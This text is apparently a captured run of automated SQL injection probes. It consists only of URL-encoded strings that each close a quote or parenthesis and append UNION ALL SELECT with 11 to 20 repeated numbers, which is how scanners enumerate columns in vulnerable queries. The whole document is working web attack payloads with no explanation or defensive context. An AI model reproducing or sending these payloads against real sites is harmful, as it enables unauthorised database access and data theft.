-6804%27%20UNION%20ALL%20SELECT%201788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788%2C1788--%20 -4980%27%20UNION%20ALL%20SELECT%209878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878%2C9878--%20 -7165%27%20UNION%20ALL%20SELECT%204000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000%2C4000--%20 -8985%27%29%20UNION%20ALL%20SELECT%204918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918%2C4918--%20 -8850%27%29%20UNION%20ALL%20SELECT%208465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465%2C8465--%20 -1892%27%29%20UNION%20ALL%20SELECT%204327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327%2C4327--%20 -4689%27%29%20UNION%20ALL%20SELECT%204093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093--%20 -6855%27%29%20UNION%20ALL%20SELECT%203670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670%2C3670--%20 -4463%27%29%20UNION%20ALL%20SELECT%205021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021--%20 -4081%27%29%20UNION%20ALL%20SELECT%203758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758%2C3758--%20 -5320%27%29%20UNION%20ALL%20SELECT%205498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498--%20 -2960%27%29%20UNION%20ALL%20SELECT%201562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562--%20 -6794%27%29%20UNION%20ALL%20SELECT%207593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593--%20 -3853%27%29%29%20UNION%20ALL%20SELECT%203200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200--%20 -5493%27%29%29%20UNION%20ALL%20SELECT%203861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861--%20 -7078%27%29%29%20UNION%20ALL%20SELECT%204755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755--%20 -4003%27%29%29%20UNION%20ALL%20SELECT%201078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078%2C1078--%20 -7110%27%29%29%20UNION%20ALL%20SELECT%208555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555--%20 -5754%27%29%29%20UNION%20ALL%20SELECT%205230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230%2C5230--%20 -2204%27%29%29%20UNION%20ALL%20SELECT%209311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311%2C9311--%20 -2800%27%29%29%20UNION%20ALL%20SELECT%202026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026%2C2026--%20 -5692%27%29%29%20UNION%20ALL%20SELECT%208292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292--%20 -4793%27%29%29%20UNION%20ALL%20SELECT%203666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666--%20 -7207%27%29%29%29%20UNION%20ALL%20SELECT%209679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679--%20 -1969%27%29%29%29%20UNION%20ALL%20SELECT%204863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863--%20 -8286%27%29%29%29%20UNION%20ALL%20SELECT%201841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841%2C1841--%20 -1896%27%29%29%29%20UNION%20ALL%20SELECT%203513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513%2C3513--%20 -2241%27%29%29%29%20UNION%20ALL%20SELECT%208420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420--%20 -8778%27%29%29%29%20UNION%20ALL%20SELECT%204950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950%2C4950--%20 -9646%27%29%29%29%20UNION%20ALL%20SELECT%207414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414%2C7414--%20 -9380%27%29%29%29%20UNION%20ALL%20SELECT%207439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439%2C7439--%20 -2142%27%29%29%29%20UNION%20ALL%20SELECT%201090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090--%20 -6827%27%29%29%29%20UNION%20ALL%20SELECT%202265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265%2C2265--%20 -5925%27%20UNION%20ALL%20SELECT%208534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534%2C8534--%20 -4236%27%20UNION%20ALL%20SELECT%201675%2C1675%2C1675%2C1675%2C1675%2C1675%2C1675%2C1675%2C1675%2C1675%2C1675%2C1675--%20 -3923%27%20UNION%20ALL%20SELECT%208718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718--%20 -1206%27%20UNION%20ALL%20SELECT%205216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216--%20 -2036%27%20UNION%20ALL%20SELECT%207477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477%2C7477--%20 -6375%27%20UNION%20ALL%20SELECT%203919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919--%20 -6101%27%20UNION%20ALL%20SELECT%201120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120--%20 -7670%27%20UNION%20ALL%20SELECT%207757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757--%20 -7851%27%20UNION%20ALL%20SELECT%208395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395%2C8395--%20 -8665%27%20UNION%20ALL%20SELECT%208495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495--%20 -5602%22%29%20UNION%20ALL%20SELECT%208830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830--%20 -3386%22%29%20UNION%20ALL%20SELECT%208690%2C8690%2C8690%2C8690%2C8690%2C8690%2C8690%2C8690%2C8690%2C8690%2C8690%2C8690--%20 -1811%22%29%20UNION%20ALL%20SELECT%203336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336%2C3336--%20 -9068%22%29%20UNION%20ALL%20SELECT%205426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426%2C5426--%20 -3404%22%29%20UNION%20ALL%20SELECT%203895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895%2C3895--%20 -5349%22%29%20UNION%20ALL%20SELECT%202681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681%2C2681--%20 -1740%22%29%20UNION%20ALL%20SELECT%201929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929%2C1929--%20 -1330%22%29%20UNION%20ALL%20SELECT%206488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488%2C6488--%20 -8960%22%29%20UNION%20ALL%20SELECT%208284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284%2C8284--%20 -5300%22%29%20UNION%20ALL%20SELECT%208753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753%2C8753--%20 -1730%22%29%29%20UNION%20ALL%20SELECT%208580%2C8580%2C8580%2C8580%2C8580%2C8580%2C8580%2C8580%2C8580%2C8580%2C8580--%20 -5840%22%29%29%20UNION%20ALL%20SELECT%207956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956%2C7956--%20 -4449%22%29%29%20UNION%20ALL%20SELECT%209670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670--%20 -5116%22%29%29%20UNION%20ALL%20SELECT%201934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934--%20 -2674%22%29%29%20UNION%20ALL%20SELECT%206680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680--%20 -2542%22%29%29%20UNION%20ALL%20SELECT%206159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159%2C6159--%20 -9280%22%29%29%20UNION%20ALL%20SELECT%208481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481--%20 -7762%22%29%29%20UNION%20ALL%20SELECT%209806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806--%20 -1146%22%29%29%20UNION%20ALL%20SELECT%202727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727--%20 -2396%22%29%29%20UNION%20ALL%20SELECT%208734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734%2C8734--%20 -7551%22%29%29%29%20UNION%20ALL%20SELECT%206042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042--%20 -1207%22%29%29%29%20UNION%20ALL%20SELECT%204889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889%2C4889--%20 -7011%22%29%29%29%20UNION%20ALL%20SELECT%205119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119%2C5119--%20 -3532%22%29%29%29%20UNION%20ALL%20SELECT%206346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346%2C6346--%20 -9958%22%29%29%29%20UNION%20ALL%20SELECT%208009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009%2C8009--%20 -8489%22%29%29%29%20UNION%20ALL%20SELECT%207442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442%2C7442--%20 -3431%22%29%29%29%20UNION%20ALL%20SELECT%206659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659%2C6659--%20 -9686%22%29%29%29%20UNION%20ALL%20SELECT%208777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777--%20 -2111%22%29%29%29%20UNION%20ALL%20SELECT%206008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008--%20 -2948%22%29%29%29%20UNION%20ALL%20SELECT%203587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587%2C3587--%20 -5913%22%20UNION%20ALL%20SELECT%205863%2C5863%2C5863%2C5863%2C5863%2C5863%2C5863%2C5863%2C5863%2C5863%2C5863--%20 -8057%22%20UNION%20ALL%20SELECT%207073%2C7073%2C7073%2C7073%2C7073%2C7073%2C7073%2C7073%2C7073%2C7073%2C7073%2C7073--%20 -1800%22%20UNION%20ALL%20SELECT%205060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060%2C5060--%20 -8225%22%20UNION%20ALL%20SELECT%203001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001--%20 -7232%22%20UNION%20ALL%20SELECT%204555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555%2C4555--%20 -9394%22%20UNION%20ALL%20SELECT%204508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508%2C4508--%20 -1166%22%20UNION%20ALL%20SELECT%209934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934%2C9934--%20 -7849%22%20UNION%20ALL%20SELECT%206530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530--%20 -2835%22%20UNION%20ALL%20SELECT%207528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528%2C7528--%20 -1434%22%20UNION%20ALL%20SELECT%209628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628%2C9628--%20 -6408%22%29%20UNION%20ALL%20SELECT%207723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723%2C7723--%20 -7549%22%29%20UNION%20ALL%20SELECT%205965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965--%20 -7786%22%29%20UNION%20ALL%20SELECT%201640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640%2C1640--%20 -7755%22%29%20UNION%20ALL%20SELECT%207940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940%2C7940--%20 -4185%22%29%20UNION%20ALL%20SELECT%208567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567--%20 -3622%22%29%20UNION%20ALL%20SELECT%201324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324%2C1324--%20 -3077%22%29%20UNION%20ALL%20SELECT%202903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903--%20 -6432%22%29%20UNION%20ALL%20SELECT%205258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258%2C5258--%20 -3261%22%29%20UNION%20ALL%20SELECT%202336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336%2C2336--%20 -1350%22%29%20UNION%20ALL%20SELECT%203306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306%2C3306--%20 -1395%22%29%29%20UNION%20ALL%20SELECT%209044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044--%20 -7309%22%29%29%20UNION%20ALL%20SELECT%205141%2C5141%2C5141%2C5141%2C5141%2C5141%2C5141%2C5141%2C5141%2C5141%2C5141%2C5141--%20 -7123%22%29%29%20UNION%20ALL%20SELECT%208900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900%2C8900--%20 -2220%22%29%29%20UNION%20ALL%20SELECT%206683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683%2C6683--%20 -5101%22%29%29%20UNION%20ALL%20SELECT%201445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445%2C1445--%20 -4648%22%29%29%20UNION%20ALL%20SELECT%205871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871%2C5871--%20 -8238%22%29%29%20UNION%20ALL%20SELECT%206141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141%2C6141--%20 -3751%22%29%29%20UNION%20ALL%20SELECT%202072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072%2C2072--%20 -8626%22%29%29%20UNION%20ALL%20SELECT%201734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734%2C1734--%20 -9030%22%29%29%20UNION%20ALL%20SELECT%204774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774%2C4774--%20 -6161%22%29%29%29%20UNION%20ALL%20SELECT%209951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951%2C9951--%20 -6255%22%29%29%29%20UNION%20ALL%20SELECT%207593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593--%20 -7534%22%29%29%29%20UNION%20ALL%20SELECT%204633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633%2C4633--%20 -3818%22%29%29%29%20UNION%20ALL%20SELECT%207301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301--%20 -2982%22%29%29%29%20UNION%20ALL%20SELECT%207262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262%2C7262--%20 -1253%22%29%29%29%20UNION%20ALL%20SELECT%201310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310%2C1310--%20 -7007%22%29%29%29%20UNION%20ALL%20SELECT%202224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224%2C2224--%20 -8293%22%29%29%29%20UNION%20ALL%20SELECT%207580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580%2C7580--%20 -8388%22%29%29%29%20UNION%20ALL%20SELECT%202498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498--%20 -9792%22%29%29%29%20UNION%20ALL%20SELECT%207003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003--%20 -1440%22%20UNION%20ALL%20SELECT%205675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675%2C5675--%20 -1430%22%20UNION%20ALL%20SELECT%204093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093%2C4093--%20 -4182%22%20UNION%20ALL%20SELECT%206512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512%2C6512--%20 -5673%22%20UNION%20ALL%20SELECT%207365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365--%20 -9474%22%20UNION%20ALL%20SELECT%203137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137%2C3137--%20 -5276%22%20UNION%20ALL%20SELECT%201722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722%2C1722--%20 -7281%22%20UNION%20ALL%20SELECT%207291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291%2C7291--%20 -6706%22%20UNION%20ALL%20SELECT%209612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612--%20 -4061%22%20UNION%20ALL%20SELECT%204870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870%2C4870--%20 -7481%22%20UNION%20ALL%20SELECT%202996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996%2C2996--%20 -7547%25%27%29%20UNION%20ALL%20SELECT%205647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647%2C5647--%20 -3900%25%27%29%20UNION%20ALL%20SELECT%209032%2C9032%2C9032%2C9032%2C9032%2C9032%2C9032%2C9032%2C9032%2C9032%2C9032%2C9032--%20 -8397%25%27%29%20UNION%20ALL%20SELECT%203099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099%2C3099--%20 -8197%25%27%29%20UNION%20ALL%20SELECT%201051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051%2C1051--%20 -8173%25%27%29%20UNION%20ALL%20SELECT%203392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392%2C3392--%20 -9454%25%27%29%20UNION%20ALL%20SELECT%209858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858%2C9858--%20 -1480%25%27%29%20UNION%20ALL%20SELECT%206918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918%2C6918--%20 -7963%25%27%29%20UNION%20ALL%20SELECT%209818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818%2C9818--%20 -9874%25%27%29%20UNION%20ALL%20SELECT%205498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498%2C5498--%20 -1049%25%27%29%20UNION%20ALL%20SELECT%208765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765--%20 -3375%25%27%29%29%20UNION%20ALL%20SELECT%202801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801--%20 -7630%25%27%29%29%20UNION%20ALL%20SELECT%203417%2C3417%2C3417%2C3417%2C3417%2C3417%2C3417%2C3417%2C3417%2C3417%2C3417%2C3417--%20 -5479%25%27%29%29%20UNION%20ALL%20SELECT%203776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776%2C3776--%20 -1692%25%27%29%29%20UNION%20ALL%20SELECT%207843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843%2C7843--%20 -3533%25%27%29%29%20UNION%20ALL%20SELECT%202769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769%2C2769--%20 -9780%25%27%29%29%20UNION%20ALL%20SELECT%207923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923%2C7923--%20 -4018%25%27%29%29%20UNION%20ALL%20SELECT%207902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902%2C7902--%20 -9423%25%27%29%29%20UNION%20ALL%20SELECT%204268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268%2C4268--%20 -5728%25%27%29%29%20UNION%20ALL%20SELECT%205050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050--%20 -4440%25%27%29%29%20UNION%20ALL%20SELECT%205842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842--%20 -5127%25%27%29%29%29%20UNION%20ALL%20SELECT%207713%2C7713%2C7713%2C7713%2C7713%2C7713%2C7713%2C7713%2C7713%2C7713%2C7713--%20 